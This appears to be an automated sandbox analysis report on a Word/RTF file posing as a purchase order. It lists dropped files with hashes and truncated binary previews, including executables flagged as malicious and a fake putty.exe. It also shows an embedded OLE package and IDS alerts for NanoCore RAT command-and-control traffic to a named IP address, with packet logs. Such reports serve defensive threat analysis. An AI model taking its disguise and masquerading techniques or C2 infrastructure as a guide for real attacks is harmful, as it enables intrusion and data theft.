                                Preview: L..................F.... ...-....{..-....{.....'................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2......Ss. .NEWPO1~1.DOC..Z.......Q.y.Q.y*...8.....................N.E.W. .P.O.1.1.0.0.3.7.2.9.5.4. .-...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\899552\Users.user\Desktop\NEW PO1100372954 -.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.E.W. .P.O.1.1.0.0.3.7.2.9.5.4. .-...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......899552..........D_....3N...W..
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):92
                                Entropy (8bit):4.571374526629979
                                Encrypted:false
                                SSDEEP:3:M1LSUPkcQjOru4oziUPkcQjOru4omX1LSUPkcQjOru4ov:MVnP66ru443P66ru4DnP66ru4y
                                MD5:0865393879B83EFC01FD7C549E71A9A5
                                SHA1:899AE6A283B9B9F0F62475C18E135B09397ED727
                                SHA-256:967255627D9D9D210D5279B8DAFF2975BE25A21A3E7E1E756896AEEF41B4751C
                                SHA-512:E8FA619372F9FDCF50114BF8C42C56163ECA7E325BFF8C72F9E1685D79E70FEF45A7270420576110EB1C382D70A2B1EB8F44A788451A852B0F5BCBD5F7D628CE
                                Malicious:false
                                Reputation:unknown
                                Preview: [doc]..NEW PO1100372954 -.LNK=0..NEW PO1100372954 -.LNK=0..[doc]..NEW PO1100372954 -.LNK=0..
                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.4311600611816426
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                Malicious:false
                                Reputation:unknown
                                Preview: .user..................................................A.l.b.u.s.............p.......................................P......................z...............x...
                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:Qn:Qn
                                MD5:F3B25701FE362EC84616A93A45CE9998
                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                Malicious:false
                                Reputation:unknown
                                Preview: ..
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\490281AC8GSCNCH37UYE.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LOCAUF6YJEF7K6W8Y37G.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RA5AG9965KYDVANTRM0T.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Process:C:\ProgramData\images.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1378816
                                Entropy (8bit):7.548476087877472
                                Encrypted:false
                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Users\user\AppData\Roaming\putty.exe
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Roaming\zbEIIaj.tmp
                                Process:C:\ProgramData\images.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                Category:dropped
                                Size (bytes):40960
                                Entropy (8bit):0.7798653713156546
                                Encrypted:false
                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                Malicious:false
                                Reputation:unknown
                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Roaming\zzoj.CG.tmp
                                Process:C:\ProgramData\images.exe
                                File Type:ASCII text, with very long lines, with no line terminators
                                Category:dropped
                                Size (bytes):35549
                                Entropy (8bit):6.06431092799383
                                Encrypted:false
                                SSDEEP:768:2F3tAP0WdZWTHzO+EMvDBdIu++qtXQQJokdugILQ67IU4I9zrLWJ:k3O8Ni+RvDD5/qNQmduDKRIFrLWJ
                                MD5:4E06FDEE66DA477D15AAAFD104802FF3
                                SHA1:2814763828D036134EEF93F28D6C499913E903AA
                                SHA-256:835ADDCE810330CA6D1FE5AA598CB758B639173086517BEBC6B0AAC7CBFDAA1D
                                SHA-512:42521F28CAD2FEA206592962A999202FA65E4A398EF29B9A759DAFFAD60CA95E027ABB52E523C799E7C131A15B17CDFC46FEC102C48EF7569D381C6E47680F37
                                Malicious:false
                                Reputation:unknown
                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"84.0.4147.89"},"easy_unlock":{"device_id":"f691bb0f-1b4f-4339-aef5-321b65f13447"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.595529173769173e+12,"network":1.595503998e+12,"ticks":494811744.0,"uncertainty":4224807.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADCJQEpL4peQLs/tCx05ts1AAAAAAIAAAAAABBmAAAAAQAAIAAAAHMdBSm688AB9E4ujGBlc8b12w9pH8Ho0MG5KX0s9TvsAAAAAA6AAAAAAgAAIAAAAKp70FMSZVCDUsFN1iNo5k0cdS+uI3XobvqN11pz11FbMAAAAHEgEYBv3dbmfqLRp8KY9FTYBCEdPLIJnBuQSIy6PW6ieb+TQlX0tlf+joBO06Pyo0AAAADT82DjaNvFLY7T0RywXTGepumesXXBFeM5MLg7ZlErGegSazITBqJVemjLdeT3R2c6H7dl+tlEXxt1m8SJWLUl"},"policy":{"last_statistics_update":"13240002771769952"},"profile":{"info_cache":{"Default":{"active_time":1595529172.199256,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_26","background_apps":false,"
                                C:\Users\user\Desktop\~$W PO1100372954 -.doc
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.4311600611816426
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                Malicious:false
                                Reputation:unknown
                                Preview: .user..................................................A.l.b.u.s.............p.......................................P......................z...............x...
                                C:\Windows\System32\rfxvmt.dll
                                Process:C:\ProgramData\images.exe
                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):37376
                                Entropy (8bit):5.7181012847214445
                                Encrypted:false
                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                Malicious:false
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:Rich Text Format data, unknown version
                                Entropy (8bit):3.1682008800082904
                                TrID:
                                • Rich Text Format (5005/1) 55.56%
                                • Rich Text Format (4004/1) 44.44%
                                File name:NEW PO1100372954 -.doc
                                File size:234750
                                MD5:afe48e30fc3f12c2b6ad7d19ae1fff8e
                                SHA1:2ded99867d8b3e9499b10743ae732efec19ccc8e
                                SHA256:ecef57afce8a7d5eed2080401da0ce36d67c2493cf1385b432a6bf0a65f6e521
                                SHA512:9a2bcef0c2f34c68fab71898cdebf2deb8c937fb87b5195fc99e5f4e6bbc156d6549a6fb0535ba4602b95ff1e7bff4404b30ce695c7498be6e21d48a71f2bb58
                                SSDEEP:1536:itW7qA4b64DJ/b6lP1JsvggNNzoBxqM8RLlypLBCy/ndzFz76mAg5eeVhMDw5wfv:itW7qA4b64ggaeG/ndzFtr5RDAw5wfv
                                File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                File Icon

                                Icon Hash:e4eea2aaa4b4b4a4

                                Static RTF Info

                                Objects

                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                000000961h2embeddedpackage20578abdtfhgXgdghgh.ScTC:\jsdsTggf\abdtfhgXGdghgh.ScTC:\CbkepaDw\abdtfhghgdghgh.ScTno
                                10000B188h2embeddedOLE2LInk2560no

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                08/02/21-11:00:55.449858TCP2025019ET TROJAN Possible NanoCore C2 60B491708234192.168.2.22203.159.80.186
                                08/02/21-11:01:04.085356TCP2025019ET TROJAN Possible NanoCore C2 60B491718234192.168.2.22203.159.80.186
                                08/02/21-11:01:10.279735TCP2025019ET TROJAN Possible NanoCore C2 60B491728234192.168.2.22203.159.80.186
                                08/02/21-11:01:11.005994TCP2025019ET TROJAN Possible NanoCore C2 60B491728234192.168.2.22203.159.80.186
                                08/02/21-11:01:15.859665TCP2025019ET TROJAN Possible NanoCore C2 60B491738234192.168.2.22203.159.80.186
                                08/02/21-11:01:26.222099TCP2025019ET TROJAN Possible NanoCore C2 60B491748234192.168.2.22203.159.80.186
                                08/02/21-11:01:26.832941TCP2025019ET TROJAN Possible NanoCore C2 60B491748234192.168.2.22203.159.80.186
                                08/02/21-11:01:31.194297TCP2025019ET TROJAN Possible NanoCore C2 60B491758234192.168.2.22203.159.80.186
                                08/02/21-11:01:36.418179TCP2025019ET TROJAN Possible NanoCore C2 60B491768234192.168.2.22203.159.80.186
                                08/02/21-11:01:41.681580TCP2025019ET TROJAN Possible NanoCore C2 60B491778234192.168.2.22203.159.80.186
                                08/02/21-11:01:52.872032TCP2025019ET TROJAN Possible NanoCore C2 60B491788234192.168.2.22203.159.80.186
                                08/02/21-11:01:58.316930TCP2025019ET TROJAN Possible NanoCore C2 60B491798234192.168.2.22203.159.80.186
                                08/02/21-11:01:58.959256TCP2025019ET TROJAN Possible NanoCore C2 60B491798234192.168.2.22203.159.80.186
                                08/02/21-11:02:03.607658TCP2025019ET TROJAN Possible NanoCore C2 60B491808234192.168.2.22203.159.80.186

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 2, 2021 10:59:54.181540012 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.219240904 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.219322920 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.220050097 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.251251936 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.251281023 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.251302004 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.251323938 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.251357079 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.251631021 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.282464981 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282495975 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282511950 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282535076 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282556057 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282576084 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282597065 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282608986 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.282615900 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282643080 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.282646894 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.282649994 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311568975 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311600924 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311621904 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311642885 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311640978 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311666965 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311675072 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311680079 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311682940 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311690092 CEST8049165203.159.80.186192.168.2.22
